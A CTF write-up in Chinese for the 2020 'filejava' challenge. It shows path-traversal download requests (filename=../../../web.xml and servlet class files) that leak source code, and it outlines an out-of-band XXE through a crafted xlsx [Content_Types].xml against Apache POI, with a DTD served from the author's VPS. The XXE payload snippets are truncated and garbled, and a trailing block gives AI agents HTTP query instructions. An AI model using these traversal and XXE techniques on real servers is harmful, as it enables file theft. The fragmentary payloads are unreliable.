# \[青龙组]filejava 由于环境有问题,看不到500请求。这里存在web.xml文件泄露 ``` filename=../../../web.xml ``` 根据xml文件内容下载class ``` filename=../../../classes/cn/abc/servlet/UploadServlet.class filename=../../../classes/cn/abc/servlet/DownloadServlet.class filename=../../../classes/cn/abc/servlet/ListFileServlet.class ``` 其中UploadServlet.class存在excel文件处理 ``` if (filename.startsWith("excel-") && "xlsx".equals(fileExtName)) { try { Workbook wb1 = WorkbookFactory.create(in); Sheet sheet = wb1.getSheetAt(0); System.out.println(sheet.getFirstRowNum()); } catch (InvalidFormatException var20) { System.err.println("poi-ooxml-3.10 has something wrong"); var20.printStackTrace(); } } ``` 有个毒点是直到这里我还不能确定版本号,但是确实是用了2014的一个CVE来的。这里的调用栈:通过WorkbookFactory.create()进入OPCPackage类中,在该类中创建ZipPackage用来处理excel文件,在this.getPartsImpl()读取\[Content\_Types].xml文件,最后通过`Document xmlContentTypeDoc = xmlReader.read(in);` 来处理文件,触发XXE。 利用思路: 通过7-zip编辑excel-123456.xlsx/\[Content-Types].xml文件 ``` %vps; %all; ]> ``` 远程8888起个pyweb,file.dtd: ``` "> ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gitbook-88.gitbook.io/ctf-writeup/2020/2020-wang-ding-bei/qing-long-zu-filejava.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.